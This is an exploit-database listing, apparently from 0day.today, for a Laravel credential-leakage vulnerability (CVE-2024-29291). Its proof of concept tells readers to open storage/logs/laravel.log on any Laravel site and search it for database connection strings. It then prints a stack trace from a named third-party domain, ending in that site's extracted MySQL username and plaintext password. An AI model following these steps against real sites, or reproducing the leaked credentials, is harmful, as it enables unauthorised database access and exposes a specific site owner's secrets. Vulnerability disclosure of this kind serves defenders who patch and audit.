Lucene search
Huseein Amer1337DAY-ID-39570HistoryApr 21, 2024 - 12:00 a.m.
Laravel Framework 11 - Credential Leakage Vulnerability
2024-04-2100:00:00
Huseein Amer
0day.today
96
laravel
credential leakage
vulnerability
cve-2024-29291
proof of concept
php
security vulnerability
pdo
connector.
# Exploit Title: Laravel Framework 11 - Credential Leakage
# Exploit Author: Huseein Amer
# Vendor Homepage: [https://laravel.com/]
# Software Link: N/A
# Version: 8.* - 11.* (REQUIRED)
# Tested on: [N/A]
# CVE : CVE-2024-29291
Proof of concept:
Go to any Laravel-based website and navigate to storage/logs/laravel.log.
Open the file and search for "PDO->__construct('mysql:host=".
The result:
shell
Copy code
#0
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(70):
PDO->__construct('mysql:host=sql1...', 'u429384055_jscv', 'Jaly$$a0p0p0p0',
Array)
#1
/home/u429384055/domains/js-cvdocs.online/public_html/vendor/laravel/framework/src/Illuminate/Database/Connectors/Connector.php(46):
Illuminate\Database\Connectors\Connector->createPdoConnection('mysql:host=sql1...',
'u429384055_jscv', 'Jaly$$a0p0p0p0', Array)
Credentials:
Username: u429384055_jscv
Password: Jaly$$a0p0p0p0
Host: sql1...
Related
nvd
nvd
CVE-2024-29291
2024-04-16 23:15:08
cve
cve
CVE-2024-29291
2024-04-16 23:15:08
packetstorm
packetstorm
Laravel Framework 11 Credential Disclosure
2024-04-22 00:00:00
cvelist
cvelist
CVE-2024-29291
2024-04-16 00:00:00
exploitdb
exploitdb
Laravel Framework 11 - Credential Leakage
2024-04-21 00:00:00